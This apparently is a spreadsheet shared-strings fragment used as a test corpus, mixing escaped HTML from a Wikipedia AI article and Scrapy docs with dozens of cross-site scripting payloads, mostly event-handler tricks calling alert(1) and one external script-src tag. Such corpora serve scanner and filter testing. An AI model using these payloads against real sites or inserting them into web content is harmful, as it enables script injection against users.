    <t>&lt;bgsound id=x tabindex=1 onfocus=alert(1)&gt;&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;th style="padding:0.1em"&gt;&lt;a href="/wiki/Artificial_intelligence#Goals" title="Artificial intelligence"&gt;Major goals &lt;/a&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td class="plainlist" style="padding:0 0.1em 0.4em"&gt;</t>
  </si>
  <si>
    <t>&lt;div id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/div&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div class="plainlinks hlist navbar mini"&gt;&lt;ul&gt;&lt;li class="nv-view"&gt;&lt;a href="/wiki/Template:Computer_science" title="Template:Computer science"&gt;&lt;abbr title="View this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;v &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-talk"&gt;&lt;a href="/wiki/Template_talk:Computer_science" title="Template talk:Computer science"&gt;&lt;abbr title="Discuss this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;t &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt;&lt;li class="nv-edit"&gt;&lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Template:Computer_science&amp;amp;action=edit"&gt;&lt;abbr title="Edit this template" style=";;background:none transparent;border:none;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none; padding:0;"&gt;e &lt;/abbr&gt; &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;summary onkeyup="alert(1)" contenteditable&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;sup onpointerdown=alert(1)&gt;XSS&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;cite onpaste="alert(1)" contenteditable&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;map onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/map&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;font onpaste="alert(1)" contenteditable&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;meter onclick="alert(1)"&gt;test&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onpointerdown=alert(1)&gt;XSS&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>AI applications widely used behind the scenes:</t>
  </si>
  <si>
    <t>&lt;title onpointermove=alert(1)&gt;XSS&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;table oncontextmenu="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;327–335, 434–435 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;kbd style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Constructive_empiricism" title="Constructive empiricism"&gt;Constructive empiricism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">          &lt;dd&gt;&lt;a href="/en/master/"&gt;master&lt;/a&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Constructive_realism" title="Constructive realism"&gt;Constructive realism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;a class="external text" href="https://en.wikipedia.org/w/index.php?title=Special:Log&amp;amp;type=review&amp;amp;page=Artificial_intelligence"&gt;reviewed &lt;/a&gt; on &lt;i&gt;16 March 2020 &lt;/i&gt;. &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;p onmouseover="alert(1)"&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onkeypress="alert(1)" contenteditable&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onclick="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-60"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-60"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;head id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/head&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;track onkeyup="alert(1)" contenteditable&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;pre onmouseout="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;i style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onclick="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_economics" title="Glossary of economics"&gt;Economics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;blink onpointerdown=alert(1)&gt;XSS&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;ins onpaste="alert(1)" contenteditable&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;title id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/title&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;&lt;a href="/wiki/Ray_Kurzweil" title="Ray Kurzweil"&gt;Ray Kurzweil &lt;/a&gt; has used &lt;a href="/wiki/Moore%27s_law" title="Moore&amp;#39;s law"&gt;Moore's law &lt;/a&gt; (which describes the relentless exponential improvement in digital technology) to calculate that &lt;a href="/wiki/Desktop_computer" title="Desktop computer"&gt;desktop computers &lt;/a&gt; will have the same processing power as human brains by the year 2029, and predicts that the singularity will occur in 2045.&lt;sup id="cite_ref-Singularity_410-2" class="reference"&gt;&lt;a href="#cite_note-Singularity-410"&gt;&amp;#91;398&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;option draggable="true" ondragstart="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;select onpointerout=alert(1)&gt;XSS&lt;/select&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Representing_categories_and_relations-93"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Representing_categories_and_relations_93-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Representing_categories_and_relations_93-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-221"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-221"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;408–417 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Military_robot" title="Military robot"&gt;Military &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="intro/install.html"&gt;Installation guide&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;audio onpointerout=alert(1)&gt;XSS&lt;/audio&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFBrooks1990" class="citation journal"&gt;&lt;a href="/wiki/Rodney_Brooks" title="Rodney Brooks"&gt;Brooks, Rodney &lt;/a&gt; (1990). &lt;a rel="nofollow" class="external text" href="http://people.csail.mit.edu/brooks/papers/elephants.pdf"&gt;"Elephants Don't Play Chess" &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;colgroup ondblclick="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-366"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-366"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;wbr id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;bdo id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/bdo&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onmouseleave="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;s onclick="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Deep feedforward neural networks </t>
  </si>
  <si>
    <t>&lt;isindex id=x tabindex=1 onactivate=alert(1)&gt;&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;spacer draggable="true" ondragleave="alert(1)"&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;iframe draggable="true" ondragend="alert(1)"&gt;test&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Naive_Bayes_classifier" title="Naive Bayes classifier"&gt;Naive Bayes classifier &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;noframes onbeforecut="alert(1)" contenteditable&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. Harvard University Press. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-674-57616-2" title="Special:BookSources/978-0-674-57616-2"&gt;&lt;bdi&gt;978-0-674-57616-2 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Mind+Children&amp;amp;rft.pub=Harvard+University+Press&amp;amp;rft.date=1988&amp;amp;rft.isbn=978-0-674-57616-2&amp;amp;rft.aulast=Moravec&amp;amp;rft.aufirst=Hans&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fmindchildrenfutu00mora&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Write your first Scrapy project.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onmousedown="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;isindex id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;label onbeforecut="alert(1)" contenteditable&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;pre onblur=alert(1) tabindex=1 id=x&gt;&lt;/pre&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;631–643 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;tt onbeforepaste="alert(1)" contenteditable&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;video id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/video&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;ul id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;button onbeforecut="alert(1)" contenteditable&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/W._Ross_Ashby" title="W. Ross Ashby"&gt;William Ross Ashby &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;b onpointermove=alert(1)&gt;XSS&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;base onbeforepaste="alert(1)" contenteditable&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;track onmousedown="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMoravec1988"&gt;Moravec 1988 &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;iframe id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;wbr draggable="true" ondragenter="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;article id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/article&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Several different forms of logic are used in AI research. &lt;a href="/wiki/Propositional_logic" class="mw-redirect" title="Propositional logic"&gt;Propositional logic &lt;/a&gt;&lt;sup id="cite_ref-Propositional_logic_197-0" class="reference"&gt;&lt;a href="#cite_note-Propositional_logic-197"&gt;&amp;#91;193&amp;#93; &lt;/a&gt; &lt;/sup&gt; involves &lt;a href="/wiki/Truth_function" title="Truth function"&gt;truth functions &lt;/a&gt; such as "or" and "not". &lt;a href="/wiki/First-order_logic" title="First-order logic"&gt;First-order logic &lt;/a&gt;&lt;sup id="cite_ref-First-order_logic_198-0" class="reference"&gt;&lt;a href="#cite_note-First-order_logic-198"&gt;&amp;#91;194&amp;#93; &lt;/a&gt; &lt;/sup&gt; adds &lt;a href="/wiki/Quantifier_(logic)" title="Quantifier (logic)"&gt;quantifiers &lt;/a&gt; and &lt;a href="/wiki/Predicate_(mathematical_logic)" title="Predicate (mathematical logic)"&gt;predicates &lt;/a&gt;, and can express facts about objects, their properties, and their relations with each other. &lt;a href="/wiki/Fuzzy_set_theory" class="mw-redirect" title="Fuzzy set theory"&gt;Fuzzy set theory &lt;/a&gt; assigns a "degree of truth" (between 0 and 1) to vague statements such as "Alice is old" (or rich, or tall, or hungry) that are too linguistically imprecise to be completely true or false. &lt;a href="/wiki/Fuzzy_logic" title="Fuzzy logic"&gt;Fuzzy logic &lt;/a&gt; is successfully used in &lt;a href="/wiki/Control_system" title="Control system"&gt;control systems &lt;/a&gt; to allow experts to contribute vague rules such as "if you are close to the destination station and moving fast, increase the train's brake pressure"; these vague rules can then be numerically refined within the system. Fuzzy logic fails to scale well in knowledge bases; many AI researchers question the validity of chaining fuzzy-logic inferences.&lt;sup id="cite_ref-200" class="reference"&gt;&lt;a href="#cite_note-200"&gt;&amp;#91;e&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-Fuzzy_logic_201-0" class="reference"&gt;&lt;a href="#cite_note-Fuzzy_logic-201"&gt;&amp;#91;196&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-202" class="reference"&gt;&lt;a href="#cite_note-202"&gt;&amp;#91;197&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onmouseover="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;footer onblur=alert(1) tabindex=1 id=x&gt;&lt;/footer&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;code style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/code&gt;</t>
  </si>
  <si>
    <t>In fiction:</t>
  </si>
  <si>
    <t>&lt;dir onpointerleave=alert(1)&gt;XSS&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;var onmouseup="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;image2 onpointerup=alert(1)&gt;XSS&lt;/image2&gt;</t>
  </si>
  <si>
    <t>&lt;wbr id=x tabindex=1 onactivate=alert(1)&gt;&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;u style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onmouseup="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;var draggable="true" ondragstart="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Firefly_algorithm" title="Firefly algorithm"&gt;Firefly algorithm &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;u onpointerleave=alert(1)&gt;XSS&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;big onmouseup="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;blockquote onpointerup=alert(1)&gt;XSS&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;rt onpointermove=alert(1)&gt;XSS&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;center style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/center&gt;</t>
  </si>
  <si>
    <t>&lt;video onmousedown="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;u draggable="true" ondragleave="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;dl onpointermove=alert(1)&gt;XSS&lt;/dl&gt;</t>
  </si>
  <si>
    <t>&lt;image id=x tabindex=1 onactivate=alert(1)&gt;&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;base onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/base&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;var onpointerdown=alert(1)&gt;XSS&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;track id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;command style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;meta id=x tabindex=1 onfocus=alert(1)&gt;&lt;/meta&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.2991%2F978-94-91216-62-6_5"&gt;10.2991/978-94-91216-62-6_5 &lt;/a&gt;. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-94-91216-61-9" title="Special:BookSources/978-94-91216-61-9"&gt;&lt;bdi&gt;978-94-91216-61-9 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=bookitem&amp;amp;rft.atitle=One+Decade+of+Universal+Artificial+Intelligence&amp;amp;rft.btitle=Theoretical+Foundations+of+Artificial+General+Intelligence&amp;amp;rft.series=Atlantis+Thinking+Machines&amp;amp;rft.pages=67-88&amp;amp;rft.date=2012&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.228.8725&amp;amp;rft_id=info%3Adoi%2F10.2991%2F978-94-91216-62-6_5&amp;amp;rft.isbn=978-94-91216-61-9&amp;amp;rft.aulast=Hutter&amp;amp;rft.aufirst=M.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;caption onbeforecut="alert(1)" contenteditable&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;base onmouseup="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Biosemiotics" title="Biosemiotics"&gt;Biosemiotics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  Built with &lt;a href="http://sphinx-doc.org/"&gt;Sphinx&lt;/a&gt; using a &lt;a href="https://github.com/rtfd/sphinx_rtd_theme"&gt;theme&lt;/a&gt; provided by &lt;a href="https://readthedocs.org"&gt;Read the Docs&lt;/a&gt;. </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Iphofen, Ron; Kritikos, Mihalis (3 January 2019). "Regulating artificial intelligence and robotics: ethics by design in a digital society". &lt;i&gt;Contemporary Social Science &lt;/i&gt;: 1–15. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1080%2F21582041.2018.1563803"&gt;10.1080/21582041.2018.1563803 &lt;/a&gt;. &lt;a href="/wiki/International_Standard_Serial_Number" title="International Standard Serial Number"&gt;ISSN &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//www.worldcat.org/issn/2158-2041"&gt;2158-2041 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Contemporary+Social+Science&amp;amp;rft.atitle=Regulating+artificial+intelligence+and+robotics%3A+ethics+by+design+in+a+digital+society&amp;amp;rft.pages=1-15&amp;amp;rft.date=2019-01-03&amp;amp;rft_id=info%3Adoi%2F10.1080%2F21582041.2018.1563803&amp;amp;rft.issn=2158-2041&amp;amp;rft.aulast=Iphofen&amp;amp;rft.aufirst=Ron&amp;amp;rft.au=Kritikos%2C+Mihalis&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Genetic_operators" class="mw-redirect" title="Genetic operators"&gt;Genetic operators &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;cite id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;iframe style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/iframe&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. New York: Harper &amp;amp; Row. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=The+Shape+of+Automation+for+Men+and+Management&amp;amp;rft.place=New+York&amp;amp;rft.pub=Harper+%26+Row&amp;amp;rft.date=1965&amp;amp;rft.aulast=Simon&amp;amp;rft.aufirst=H.+A.&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fshapeofautomatio00simo&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;img usemap=#x&gt;&lt;map name="x"&gt;&lt;area href onfocus=alert(1) id=x&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">        &amp;copy; Copyright 2008–2020, Scrapy developers</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;li ondragover=alert(1) contenteditable&gt;drop here&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Haşim Sak, Andrew Senior, Kanishka Rao, Françoise Beaufays and Johan Schalkwyk (September 2015): &lt;a rel="nofollow" class="external text" href="http://googleresearch.blogspot.ch/2015/09/google-voice-search-faster-and-more.html"&gt;Google voice search: faster and more accurate. &lt;/a&gt; &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160309191532/http://googleresearch.blogspot.ch/2015/09/google-voice-search-faster-and-more.html"&gt;Archived &lt;/a&gt; 9 March 2016 at the &lt;a href="/wiki/Wayback_Machine" title="Wayback Machine"&gt;Wayback Machine &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;base onmouseout="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Natural_evolution_strategy" title="Natural evolution strategy"&gt;Natural evolution strategy &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT SRC="http://.rocks/.jpg"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t>&lt;main onbeforecopy="alert(1)" contenteditable&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;time onload=alert(1)&gt;&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Qualification_problem" title="Qualification problem"&gt;Qualification problem &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;nobr onkeyup="alert(1)" contenteditable&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; 2008 </t>
  </si>
  <si>
    <t>&lt;strong onpointerout=alert(1)&gt;XSS&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onpointerover=alert(1)&gt;XSS&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;datalist draggable="true" ondragstart="alert(1)"&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;center onblur=alert(1) tabindex=1 id=x&gt;&lt;/center&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Physicalism" title="Physicalism"&gt;Physicalism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Proposed "universal intelligence" tests aim to compare how well machines, humans, and even non-human animals perform on problem sets that are generic as possible. At an extreme, the test suite can contain every possible problem, weighted by &lt;a href="/wiki/Kolmogorov_complexity" title="Kolmogorov complexity"&gt;Kolmogorov complexity &lt;/a&gt;; unfortunately, these problem sets tend to be dominated by impoverished pattern-matching exercises where a tuned AI can easily exceed human performance levels.&lt;sup id="cite_ref-Mathematical_definitions_of_intelligence_287-0" class="reference"&gt;&lt;a href="#cite_note-Mathematical_definitions_of_intelligence-287"&gt;&amp;#91;276&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-288" class="reference"&gt;&lt;a href="#cite_note-288"&gt;&amp;#91;277&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;summary onblur=alert(1) tabindex=1 id=x&gt;&lt;/summary&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;script onmousedown="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFWengMcClellandPentlandSporns2001"&gt;Weng et al. 2001 &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;a onclick="alert(1)"&gt;test&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Waterhouse (&lt;i&gt;&lt;a href="/wiki/The_Baroque_Cycle" title="The Baroque Cycle"&gt;The Baroque Cycle &lt;/a&gt; &lt;/i&gt;, 2003) &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;script onpointerdown=alert(1)&gt;XSS&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;picture&gt;&lt;source srcset="validimage.png"&gt;&lt;image onload=alert(1)&gt;&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;del onpointerleave=alert(1)&gt;XSS&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;table onmouseover="alert(1)"&gt;test&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;tfoot style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/tfoot&gt;</t>
